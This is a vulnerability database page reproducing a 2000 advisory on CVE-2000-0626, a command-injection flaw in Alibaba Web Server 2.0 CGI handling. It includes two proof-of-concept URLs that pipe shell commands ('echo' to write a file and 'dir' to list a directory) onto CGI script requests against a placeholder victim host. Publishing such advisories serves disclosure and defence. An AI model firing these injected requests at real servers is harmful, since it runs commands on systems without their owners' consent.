Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2000-0626

Publish Date: 18 Jul 2000

Author: Prizm

                							

                source: http://www.securityfocus.com/bid/1485/info

Alibaba Web Server fails to filter piped commands when executing cgi-scripts. This can be used to execute commands with the privileges of the web server process on a target machine. 

http://victim/cgi-bin/post32.exe|echo%20&gt;c:\text.txt
http://victim/cgi-bin/lsindex2.bat|dir%20c:\[dir]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Computer Software Manufaktur Alibaba 2.0 - Piped Command

Vulmon Search

About

Products

Connect